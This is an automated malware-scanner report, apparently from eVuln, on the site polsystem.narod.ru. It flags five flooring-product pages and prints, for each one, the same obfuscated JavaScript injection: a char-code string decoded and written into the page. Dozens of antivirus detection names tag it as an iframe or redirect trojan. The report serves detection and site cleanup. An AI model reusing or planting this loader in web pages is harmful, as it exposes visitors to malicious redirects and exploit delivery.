Malware Scanner report for polsystem.narod.ru

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://polsystem.narod.ru/nezamerzauschaya-zhidkost-dlya-sistem-otopleniya.html	200 OK Content-Length: 17078 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!100!105!118!32!97!108!105!103!110!61!34!99!101!110!116!101!114!34!62!60!100!105!118!32!115!116!121!108!101!61!34!102!111!110!116!45!115!105!122!101!58!49!52!112!120!59!32!116!111!112!58!32!48!112!120!59!32!108!101!102!116!58!32!48!112!120!59!32!112!111!115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!98!97!99!107!103!114!111!117!110!100!58!35!70!70!70!70!70!70!59!119!105!100!116!104!58!49!48!48!37!59!104!101!105!103!104!116!58!52!48!48!37!59!112!9 ... 550 bytes are skipped ...66!37!69!53!43!37!69!70!37!69!69!37!69!66!37!70!66!39!34!62!60!105!109!103!32!115!114!99!61!34!104!116!116!112!58!47!47!112!111!108!109!97!115!116!101!114!46!110!97!114!111!100!46!114!117!47!105!109!97!103!101!115!47!112!111!108!105!109!101!114!46!103!105!102!34!32!32!98!111!114!100!101!114!61!34!48!34!62!60!47!97!62!60!47!100!105!118!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.137655434656857	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://polsystem.narod.ru/abnl/?adsdata=HKd9Im4TWNmd!9bnD!UTec0!13;T1t3aBett3XK8inb;jE6wiuJqaQs7GLHQd8jKTwSzXjxf9B3GbCEiGlD;OjCIU87d3G3Tvls;XJT^0Rp;!0dFcI19LARrmdLbJila1tAGxjeR6weDCld5emE!jwmMn3aIYa;p3cZRO5OyRDtR6MFBOTsDaQja2GBKFgHo	200 OK Content-Length: 2513 Content-Type: application/javascript	clean
http://polsystem.narod.ru/propitka-dlya-pola.html	200 OK Content-Length: 15866 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!100!105!118!32!97!108!105!103!110!61!34!99!101!110!116!101!114!34!62!60!100!105!118!32!115!116!121!108!101!61!34!102!111!110!116!45!115!105!122!101!58!49!52!112!120!59!32!116!111!112!58!32!48!112!120!59!32!108!101!102!116!58!32!48!112!120!59!32!112!111!115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!98!97!99!107!103!114!111!117!110!100!58!35!70!70!70!70!70!70!59!119!105!100!116!104!58!49!48!48!37!59!104!101!105!103!104!116!58!52!48!48!37!59!112!9 ... 550 bytes are skipped ...66!37!69!53!43!37!69!70!37!69!69!37!69!66!37!70!66!39!34!62!60!105!109!103!32!115!114!99!61!34!104!116!116!112!58!47!47!112!111!108!109!97!115!116!101!114!46!110!97!114!111!100!46!114!117!47!105!109!97!103!101!115!47!112!111!108!105!109!101!114!46!103!105!102!34!32!32!98!111!114!100!101!114!61!34!48!34!62!60!47!97!62!60!47!100!105!118!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.281039820325898	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://polsystem.narod.ru/abnl/?adsdata=rUEu0;dtn8klbtYx6b4ftEa1as9XUz2cU9HGK;P8EU0kV9nw4W;J!t!MvrXgPaKUwma0UOk3^zkMPL;KhXx;mkX1^rHlSgzPS0;Lfg3JMl52ZTmSeNtC1NRNP4QOOXIr7PkkJ;p89lNX4IJbwS2ghyUAhIq7B9gvQhuHrk4SH8Vc5qiY;d76lEGb21h8	200 OK Content-Length: 2501 Content-Type: application/javascript	clean
http://polsystem.narod.ru/napolnoe-pokrytie-kupit.html	200 OK Content-Length: 16249 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!100!105!118!32!97!108!105!103!110!61!34!99!101!110!116!101!114!34!62!60!100!105!118!32!115!116!121!108!101!61!34!102!111!110!116!45!115!105!122!101!58!49!52!112!120!59!32!116!111!112!58!32!48!112!120!59!32!108!101!102!116!58!32!48!112!120!59!32!112!111!115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!98!97!99!107!103!114!111!117!110!100!58!35!70!70!70!70!70!70!59!119!105!100!116!104!58!49!48!48!37!59!104!101!105!103!104!116!58!52!48!48!37!59!112!9 ... 550 bytes are skipped ...66!37!69!53!43!37!69!70!37!69!69!37!69!66!37!70!66!39!34!62!60!105!109!103!32!115!114!99!61!34!104!116!116!112!58!47!47!112!111!108!109!97!115!116!101!114!46!110!97!114!111!100!46!114!117!47!105!109!97!103!101!115!47!112!111!108!105!109!101!114!46!103!105!102!34!32!32!98!111!114!100!101!114!61!34!48!34!62!60!47!97!62!60!47!100!105!118!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.159001842163519	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://polsystem.narod.ru/abnl/?adsdata=9vzW46HAOGXJbYB97fF!yZvSgtrLUy2fUgGYEwjJ6BsVASWzZQtMBNZ!nG6wAa0VvstA7efq1uqL9RO1Ghf8v28FAMfje9vsVeiZrdMQg4xRAG4qp20RDgvMRpgx67DmBkbkfUv6BpY2nMshLaM5NFZEYzWkWLRRNbe;X5daWQd8azmw6SF^qI9qjkMo	200 OK Content-Length: 2533 Content-Type: application/javascript	clean
http://polsystem.narod.ru/laminirovannye-poly-fchcschschv.html	200 OK Content-Length: 16366 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!100!105!118!32!97!108!105!103!110!61!34!99!101!110!116!101!114!34!62!60!100!105!118!32!115!116!121!108!101!61!34!102!111!110!116!45!115!105!122!101!58!49!52!112!120!59!32!116!111!112!58!32!48!112!120!59!32!108!101!102!116!58!32!48!112!120!59!32!112!111!115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!98!97!99!107!103!114!111!117!110!100!58!35!70!70!70!70!70!70!59!119!105!100!116!104!58!49!48!48!37!59!104!101!105!103!104!116!58!52!48!48!37!59!112!9 ... 550 bytes are skipped ...66!37!69!53!43!37!69!70!37!69!69!37!69!66!37!70!66!39!34!62!60!105!109!103!32!115!114!99!61!34!104!116!116!112!58!47!47!112!111!108!109!97!115!116!101!114!46!110!97!114!111!100!46!114!117!47!105!109!97!103!101!115!47!112!111!108!105!109!101!114!46!103!105!102!34!32!32!98!111!114!100!101!114!61!34!48!34!62!60!47!97!62!60!47!100!105!118!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.290876497872947	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://polsystem.narod.ru/abnl/?adsdata=Ee;IKibA4OfI24mm!YV14v;ivGH3cac0ckL53cQ!PpdA9M17FAXikV4fm88z9JC8NreTZllbZb!lshzgUD9zA35M8cYntm5PUes7eTFGZhQxShfe3IrSJTO0ZVlJabaHDgJ!mQJj2ACqJeDs^D55!Awl1z;7ze9yWSZQzLANmU8jT^laMaasykeyyd0;	200 OK Content-Length: 2529 Content-Type: application/javascript	clean
http://polsystem.narod.ru/nalivnye-poly-kibsch.html	200 OK Content-Length: 15822 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!100!105!118!32!97!108!105!103!110!61!34!99!101!110!116!101!114!34!62!60!100!105!118!32!115!116!121!108!101!61!34!102!111!110!116!45!115!105!122!101!58!49!52!112!120!59!32!116!111!112!58!32!48!112!120!59!32!108!101!102!116!58!32!48!112!120!59!32!112!111!115!105!116!105!111!110!58!97!98!115!111!108!117!116!101!59!98!97!99!107!103!114!111!117!110!100!58!35!70!70!70!70!70!70!59!119!105!100!116!104!58!49!48!48!37!59!104!101!105!103!104!116!58!52!48!48!37!59!112!9 ... 550 bytes are skipped ...66!37!69!53!43!37!69!70!37!69!69!37!69!66!37!70!66!39!34!62!60!105!109!103!32!115!114!99!61!34!104!116!116!112!58!47!47!112!111!108!109!97!115!116!101!114!46!110!97!114!111!100!46!114!117!47!105!109!97!103!101!115!47!112!111!108!105!109!101!114!46!103!105!102!34!32!32!98!111!114!100!101!114!61!34!48!34!62!60!47!97!62!60!47!100!105!118!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports: AntiVir JS/Decdec.psc Avast JS:Redirector-KP [Trj] Ikarus Exploit.HTML.IframeRef nProtect Trojan.JS.QLT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.F47V0122 Emsisoft Trojan.JS.QLT (B) Comodo TrojWare.JS.Redirect.crk McAfee-GW-Edition JS/Exploit-Blacole.hv DrWeb JS.IFrame.180 Kaspersky HEUR:Trojan.Script.Iframer Microsoft VirTool:JS/Obfuscator.CC MicroWorld-eScan Trojan.JS.QLT Fortinet JS/Kryptik.BP!tr PCTools Trojan.Malscript Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.hv NANO-Antivirus Trojan.Script.Packed.iagb F-Secure Trojan.JS.QLT VIPRE Malware.JS.Generic (JS) F-Prot JS/Crypted.AT.gen eSafe JS.Agent.ia AVG JS/Redir Norman Redir.GS Sophos Mal/Iframe-F GData Trojan.JS.QLT Symantec Trojan.Malscript!JS Commtouch JS/Crypted.AT.gen Agnitum JS.Cored.A ESET-NOD32 JS/Kryptik.BP BitDefender Trojan.JS.QLT
http://s205.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.614926598767422	200 OK Content-Length: 25 Content-Type: application/javascript	clean
http://polsystem.narod.ru/abnl/?adsdata=B6hC2CZVdNjWg8buVFujygfuBu81tE5JyaUUWJklxyNUnDnL^mGmKtsKEs0XZjcZ!ErexKCSIzvsuY^^ZvTiLA15ED;gNHYpsX;bDwDhULPFj;jxd9NJRd;3Jie5w6zsmckEU5WiU5x0jBlbM6!31XCYIp3EORnudqtz^rJdurQHmsmU8fW7CXzxkGko	200 OK Content-Length: 2501 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: polsystem.narod.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: polsystem.narod.ru
Referer: http://www.google.com/search?q=polsystem.narod.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=polsystem.narod.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://polsystem.narod.ru/

Result: polsystem.narod.ru is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for polsystem.narod.ru

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools